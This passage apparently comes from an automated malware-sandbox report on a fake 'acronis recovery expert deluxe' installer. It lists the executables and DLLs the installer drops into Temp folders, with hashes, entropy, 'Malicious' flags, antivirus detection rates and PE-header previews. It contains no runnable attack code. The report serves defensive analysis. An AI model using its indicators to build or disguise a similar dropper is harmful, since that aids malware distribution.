                                                                                                                                                                                                                                        SHA-256:1485A4C19776F95875043A80CCD7223830BF9F3E6A27E87CECBCB30DF1B11587
                                                                                                                                                                                                                                        SHA-512:545C3826B0FFCA87A310EF146AA4EBEC74196609CFB0F5EEA3B085D0B3C15D865C1596F64A1AA1A00DAB4A3A9F0429612A6BD4FAA06BE58B8039EC27F8B06904
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):102400
                                                                                                                                                                                                                                        Entropy (8bit):6.62751781696343
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:0XnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqVO:03tb2j6AUkB0CThp6vmVO
                                                                                                                                                                                                                                        MD5:17BC06C71DDD7059916E5AABE0DA48B4
                                                                                                                                                                                                                                        SHA1:9E9F45880E943D4901C1873DE664ED12C2254932
                                                                                                                                                                                                                                        SHA-256:FC3CB814D3541064F45A199788AD1865571496F08635ABE48AE3BCEC74D63F76
                                                                                                                                                                                                                                        SHA-512:267E24182DAD10499FBFFB3CE1926A2F1D790EF832621D99145CFC0C4698D67222E96A1FE47DC480EC17C07EE81E38A0D4472DB5817E9B8CC978AEFF48B4F591
                                                                                                                                                                                                                                        Malicious:false
Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
File Type:data
Category:dropped
Size (bytes):33143
Entropy (8bit):7.181878880158946
Encrypted:false
SSDEEP:768:KGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:KGODv7xvTphAiPChgZ2kOE6
MD5:5326C3A5E46BF8783A052E8304C7B6F2
SHA1:E5E7EDBC039046B12AAD6B4C457AC0B2C82BFC33
SHA-256:3F1AF39BACF153B601DDE9E26D993D5BF4619122DD7D6E9A8D083D6AAD990FDE
SHA-512:F54C6739402F46C69A10DFE7D80395943294660B7A81FFF299DA5F21AAB0799F2BC1EF76ED8F4B57E9F9930DCFA37FF746D41D19FA5C228400B461E3C5556EAC
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\650429\Palestine.com
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18610385
Entropy (8bit):7.988718937379966
Encrypted:false
SSDEEP:393216:/AsuyDZ9JgjA3J3f0jec34HR0h72YZY4GO79KRaCwGt3xdBYDum1k:YK95ZsL4H6hdnGRgGbBYDm
MD5:0EFDBBF3F5074D596D3E61446B623942
SHA1:EC206D4E793A203DF221F456FD9E626EB3E8D9EC
SHA-256:85082DA27713BE48EF8CE523370111F97F0A54E2BE4CECE2463CC5671513B4C4
SHA-512:C3312A6C26455EBD86683058D4E7C49D6D92EBB42CC617A559317DE11FA54CAB7B45C8A7CC114F73DC295E68A977382F846BD2F662AF89AC918AF3A59566E5C9
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 18%
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):6144
Entropy (8bit):4.720366600008286
Encrypted:false
SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:E4211D6D009757C078A9FAC7FF4F03D4
SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):3366912
Entropy (8bit):6.530548523709476
Encrypted:false
SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
MD5:D8F3F93349755C2BD326DF91966FD6F5
SHA1:A3C9C3430D8CAE7295D42DBCBF3EAF1B0F6C709C
SHA-256:8658881C03287CC4DDC146C32FC6D966140445D6DAC6962ABDD9BB5C6249826A
SHA-512:2172A8F59DBE81430779CCD4FBCCFBA093B0E08CC3B24BD19F03790C772FE3B9ADD50F9A673DEB216C03618C153CEF05B26618C0366E4F66E48FFC5CB3259FD4
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):3366912
Entropy (8bit):6.530548523709476
Encrypted:false
SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
MD5:D8F3F93349755C2BD326DF91966FD6F5
SHA1:A3C9C3430D8CAE7295D42DBCBF3EAF1B0F6C709C
SHA-256:8658881C03287CC4DDC146C32FC6D966140445D6DAC6962ABDD9BB5C6249826A
SHA-512:2172A8F59DBE81430779CCD4FBCCFBA093B0E08CC3B24BD19F03790C772FE3B9ADD50F9A673DEB216C03618C153CEF05B26618C0366E4F66E48FFC5CB3259FD4
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):3366912
Entropy (8bit):6.530548523709476
Encrypted:false
SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
MD5:D8F3F93349755C2BD326DF91966FD6F5
SHA1:A3C9C3430D8CAE7295D42DBCBF3EAF1B0F6C709C
SHA-256:8658881C03287CC4DDC146C32FC6D966140445D6DAC6962ABDD9BB5C6249826A
SHA-512:2172A8F59DBE81430779CCD4FBCCFBA093B0E08CC3B24BD19F03790C772FE3B9ADD50F9A673DEB216C03618C153CEF05B26618C0366E4F66E48FFC5CB3259FD4
Malicious:true
                                                                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6144
                                                                                                                                                                                                                                        Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3366912
                                                                                                                                                                                                                                        Entropy (8bit):6.530548523709476
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                                                                                                                                                                                                                        MD5:D8F3F93349755C2BD326DF91966FD6F5
                                                                                                                                                                                                                                        SHA1:A3C9C3430D8CAE7295D42DBCBF3EAF1B0F6C709C
                                                                                                                                                                                                                                        SHA-256:8658881C03287CC4DDC146C32FC6D966140445D6DAC6962ABDD9BB5C6249826A
                                                                                                                                                                                                                                        SHA-512:2172A8F59DBE81430779CCD4FBCCFBA093B0E08CC3B24BD19F03790C772FE3B9ADD50F9A673DEB216C03618C153CEF05B26618C0366E4F66E48FFC5CB3259FD4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6144
                                                                                                                                                                                                                                        Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):416104
                                                                                                                                                                                                                                        Entropy (8bit):6.435477544411637
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:dMdhFRZYRiV2M05ku9aIRErBCn15rltdSv20zSUu6g3ohXgJAzsGJv6Zj:Sdh7ZoE2h5ku9aiEE15rHEru33o9SQKj
                                                                                                                                                                                                                                        MD5:8718D431F53F2E0426C023654BDA4DAD
                                                                                                                                                                                                                                        SHA1:EC926473285E520F94558B1CBF39EA705A7B9E2D
                                                                                                                                                                                                                                        SHA-256:CB142B6C81E80DFD5FC75627B305A4A7AEB22061550F6A3AF24A6767EAA29305
                                                                                                                                                                                                                                        SHA-512:1F3F4061152B03674D14EFB9C58D84B86F1B88891B9F0A288FE46D0EE9EEDCA2F29328170CADDABF37E695A644FDDDDF5FDDA503B9424E71EFB92867F07581CD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t.............m......m..^....`......`......`.......m......m........S...^`.....^`.....^`.....^`.....Rich............PE..d...J..e.........." .....<..........\...............................................2g....`.........................................P...........x....`...........:...*..h/...p..p....]..p...................._..(...0^..8............P..P............................text....:.......<.................. ..`.rdata.......P.......@..............@..@.data....-..........................@....pdata...:.......<..................@..@_RDATA.......P......................@..@.rsrc........`......................@..@.reloc..p....p......................@..B........................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):39384
                                                                                                                                                                                                                                        Entropy (8bit):6.360716101979744
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:wxxqaJMOO9TC0Vj0FfdtJbAdPNlYimppFAMxkEly/:wxkaJKXIltGdll7mpvxxO
                                                                                                                                                                                                                                        MD5:26B0A64CA2FAED0C689ED7C6F8243540
                                                                                                                                                                                                                                        SHA1:834D1D32E833580185EF8D41FEBFDB6AC3A3C5FF
                                                                                                                                                                                                                                        SHA-256:27C77D11B1BDAC5E86E39C81D0BBC928AAA6977DF2B0B14F765A49541A28C634
                                                                                                                                                                                                                                        SHA-512:F0B15838AEEC8FEF87DDEEA9091B0581F97D118A5017639B8804FE9E1B4EFA09EB153AEC6D442C4EE47B1EB84F56DE24843C370F73D070D8573D739E3CFD840B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...v...v...v..Nv...v...w...v...w...v...w...v...w...v...w...v...w...v...v..v!..w...v!..w...v!."v...v..Jv...v!..w...vRich...v........PE..d...._.f.........." .....>...\.......?.................................................... ......................................... d..l....d.......................p...)......H....T..p........................... U...............P...............................text....<.......>.................. ..`.rdata..|....P.......B..............@..@.data...0....p.......`..............@....pdata...............b..............@..@.rsrc................h..............@..@.reloc..H............n..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3214200
                                                                                                                                                                                                                                        Entropy (8bit):6.531654093710658
                                                                                                                                                                                                                                        Encrypted:false
SSDEEP:49152:d9sfqCrqDuv0LMdajQJVAXV3VWdrm054uABaPBNrJbhgOlbHNjolJPHabUa7anV:zAdv8qkV3VWX4uABaPBDddlrhxanV
MD5:EDF89B539F5EF3D8BA8BD3B9A8560DAA
SHA1:A28E079D5C1909E7C8F084CCE00BA2EB7779A444
SHA-256:65A8F6078E18E23833FBFB2C2BC635977FE536E0A45425EC57E957AB88FCBE27
SHA-512:EDFA8A0C0FAA0E89EC03E191EFF688EE475324B4F16164F45AC0278B64BC1A4771776A160E48004721321870A858916BB9DFE21DF7BC4E08E8C9DEE94F538856
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......h`..,.y.,.y.,.y.8j}.9.y.8jz. .y.8j|...y.8j..-.y.~t}.#.y.~tz.&.y.~t|.D.y.Jn....y.s}.-.y.hz.-.y.h|...y.p|...y.8jx.?.y.,.x...y..tp.>.y..ty.-.y..t..-.y.,...-.y..t{.-.y.Rich,.y.........................PE..d......f.........." .....,&...........!......................................p1.......1...`...........................................-..$..T>....... 1......`/.X.....0.x)...01.t6..0.).p.....................).(.....).8............@&..............................text....*&......,&................. ..`.rdata.. ....@&......0&.............@..@.data........`.......F..............@....pdata..X....`/.....................@..@_RDATA........1.......0.............@..@.rsrc........ 1.......0.............@..@.reloc..t6...01..8....0.............@..B................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):308624
Entropy (8bit):6.410929829905318
Encrypted:false
SSDEEP:6144:EfWg7a1lD1u6Xddxlnl3fsLvwzohMpXQ3tnIU:Eeg7aj1Dxf3cKoKgBIU
MD5:EA3DEEFB8C59AD0A93F03E9E996D92B2
SHA1:920B502E52EEC9B2002B86539DB6B7DB64E706B2
SHA-256:A1697FEAAE8B0B5306E23A6D9DDB1FB337F479434573DE002E5818AB7412C568
SHA-512:1B942414CA3B46B8E9399D84094432D2A2F89D2467554AE06433CFC9FCA273A804BDFC1BF6067DEB941651A4CB115B9DD7FEDF24EA416579C15712440EB024C2
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1k.*u..yu..yu..yaa.x...yaa.xf..yaa.x...y'..xe..y'..x...yaa.xt..y'..x1..yaa.xx..yu..y...y...xs..y...xt..y...yt..y...xt..yRichu..y................PE..d...h..b.........." ................4................................................s....`..........................................?..`...p?..x................*......./..........p...p...............................8............................................text...n........................... ..`.rdata...;.......<..................@..@.data....'...P.......:..............@....pdata...*.......,...L..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............|..............@..B........................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):308624
Entropy (8bit):6.413892452925429
Encrypted:false
SSDEEP:6144:7Txyvl7lz0d6XtdxlHV3fsLvCfohMj1SJbxf:7dyvlV0cxv3ckoQoNxf
MD5:DFA7ABA0155B6D01B1469AFFD7EF2517
SHA1:FDCCEFBA3F59E8A135E2CD9ABDCBC091192F0AA0
SHA-256:A4D60D7C86253D4680BDFCA014E64DB34090850B5CEBD5C032E5A63A484C7CD6
SHA-512:5A2533CEFE2D3F930C7434BF40E271DCC6711066030F03E4F9E53E7F095160BB0B60259401333E21DEACAD9F3DD1063F005906D4B15A933E1A5388A20B98F64C
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1k.*u..yu..yu..yaa.x...yaa.xf..yaa.x...y'..xe..y'..x...yaa.xt..y'..x1..yaa.xx..yu..y...y...xs..y...xt..y...yt..y...xt..yRichu..y................PE..d...w..b.........." ................4................................................q....`..........................................>..P....>..x................*......./..........@...p...............................8............................................text...n........................... ..`.rdata...;.......<..................@..@.data....'...P.......:..............@....pdata...*.......,...L..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............|..............@..B........................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):91536
Entropy (8bit):6.371649857861497
Encrypted:false
SSDEEP:1536:LYCac2bicLxU3E63UGiH7ZA5Mx54nI7lPOvULd7dvqffKcHKz+YG5/7WF:LYCac2biQxBxDhWvULdRvq3KcHKDU/6F
MD5:9BE4224D9DFB51972CBAF13E635926A3
SHA1:99174B120E1BC033EE74E4BE3063F6C224E5D5C8
SHA-256:72608B9F5FF32688B6C65258A525826407839AA6BC3D60E6ADE9A5AF370DD505
SHA-512:B0E5222EB601D3F2217F9219238BD1FB406987E30BDFB13EB9915DCC6747CF835CBA094952A3A5C756B52F3C9E2D26E83E3E66D9BC88BE380A33457D8DE9FB24
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^...^...^...&|..^..+...^..+...^...5...^..+...^..+...^...5...^...^..R^..6+...^..6+...^..6+...^..6+...^..Rich.^..........................PE..d......b.........." .........l......4........................................p......8T....`.............................................X...(...,....P.......@..<....6.../...`..........p...............................8...............X............................text............................... ..`.rdata...K.......L..................@..@.data...H....0......................@....pdata..<....@......."..............@..@.rsrc........P.......2..............@..@.reloc.......`.......4..............@..B................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):91024
Entropy (8bit):6.392450329332899
Encrypted:false
SSDEEP:1536:CyPVy+3gUqzIEC5iSx7ZsXxl42FOqYI3/Wc3+OBX6PzcZfjZmK84WBo/7PX:NPVy+wUotj3YIvWc3+AXezcBgK84WBor
MD5:37167182BE8130CD2ADD9E8965009930
SHA1:9A4DCDBB3CE44FF3452032E90967E11C2A28A79D
SHA-256:E368064B5C5949CED5A9874885D8D3E98FBCDA0E3D6FD603332AA6315528AF9B
SHA-512:9B8072EB3D4D8F3D6D29DFD0B42D493F3F4CAC62E7EDA2B85D5BD649B460C34E5B1936AC8C513A09D90CE7976D6C62F1B6B3281B292FBC042282C1AECB9EE8CD
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^...^...^...&|..^...5...^..+...^..+...^..+...^..+...^...5...^...^..R^..6+...^..6+...^..6+...^..6+...^..Rich.^..........................PE..d......b.........." .........l...............................................p............`.............................................`...0...,....P.......@..H....4.../...`...... ...p...............................8...............X............................text............................... ..`.rdata...L.......L..................@..@.data...8....0......................@....pdata..H....@....... ..............@..@.rsrc........P.......0..............@..@.reloc.......`.......2..............@..B................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):91024
Entropy (8bit):6.390274185816327
Encrypted:false
SSDEEP:1536:JwHNL+3gkqDIECSiSx7ZMAxV421OaPo7Wc3+OZuRfcuK840hw/73AF:yHNL+wk4tBHPo7Wc3+oMfdK84sw/0F
MD5:CF692DD1E4AFA29D6499D1818CA2B6B0
SHA1:7B4E50F82F242EFD817A7C91FAB2600F2A1C57C0
SHA-256:814DB4C14F26B6D7307B99F045B280D1D81E8815EE77E85A2583C710D18890D1
SHA-512:9CF9387A336113523CEB9E87B4C3BB551CE8CE3D15BB2EADF9A2901025E50969DB92A6DA6AD5CC79B394078385BEB186BC26A2B025327CA781AA16F03E4517D8
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^...^...^...&|..^...5...^..+...^..+...^..+...^..+...^...5...^...^..R^..6+...^..6+...^..6+...^..6+...^..Rich.^..........................PE..d......b.........." .........l...............................................p............`.............................................P.......,....P.......@..H....4.../...`......0...p...............................8...............X............................text............................... ..`.rdata...K.......L..................@..@.data...8....0......................@....pdata..H....@....... ..............@..@.rsrc........P.......0..............@..@.reloc.......`.......2..............@..B................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):216088
Entropy (8bit):6.062470753605543
Encrypted:false
SSDEEP:3072:1H7xfAIDlLQrrdfmexchURpf0fs07+OfCWnBceG6oHb3IxT:1H7xfAOuRfmqIURpsZflWeGRiT
MD5:131179112CEE5BD2686B52698F9097E4
SHA1:F7F14E534FDFEABDD040870EE85C2C5F0AC8DB3F
SHA-256:6D29C40A75CF16F065BF23E021008EECA94354645D0C07A9DB76E62B50637331
SHA-512:A197C6510E076CC8DF215F9DA1C64263CB816799DFE4A6F790AA567948414B9E0DFB3F9DB6BDC71DB793D2635847B11CCD06EBAE8CAC88E18DB76D51384BEB03
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,...h.Gh.Gh.G...Fb.G...Fm.G...F..G:..Fx.G:..F`.G...Fo.Gh.G..G:..FJ.G...Fl.G...Fi.G..]Gi.Gh.5Gi.G...Fi.GRichh.G................PE..d...hPrb.........." .........N......8........................................p......%.....`.................................................p...P....P.......0..D....(...$...`..`.......p...........................@................... ............................text............................... ..`.rdata..0...........................@..@.data...............................@....pdata..D....0......................@..@.rsrc........P......................@..@.reloc..`....`....... ..............@..B................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):316304
Entropy (8bit):6.336244135441085
Encrypted:false
SSDEEP:6144:0ofvIGt5PXBbbpIeDAgWU6or1SWIb2oh+mEFSjHp:TIebbye8gWRMIKosmFp
MD5:6B03FCC62387FC2107801EC86D8CB2F9
                                                                                                                                                                                                                                        SHA1:FCCD3492E7225BE0CA8AA485D94995D3B1B979C2
                                                                                                                                                                                                                                        SHA-256:3D4A8CD51FCA82BD7B3AE9710690EACA11FB0D6270142A7FCD6E89EF7DA7AE96
                                                                                                                                                                                                                                        SHA-512:EC93BADF11F218893AF6FA1064C4C593A5C28CE1A0B59FB344AAC7731C55766AA66579890DE6C4D074D4A27DFB80E0BD69D1B99F05BA35EAD44E3626FEB3E87B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........4.D.Z,D.Z,D.Z,!.Y-N.Z,!.^-V.Z,!._-..Z,..Y-M.Z,!.\-E.Z,.._-q.Z,..^-d.Z,!.[-I.Z,D.[,..Z,.S-C.Z,.Z-E.Z,.,E.Z,D..,E.Z,.X-E.Z,RichD.Z,........................PE..d......b.........." ................................................................._....`..........................................b..X....c..x...............$*......./..............p............................................................................text...>........................... ..`.rdata...n.......p..................@..@.data...$(...p.......V..............@....pdata..$*.......,...h..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1125776
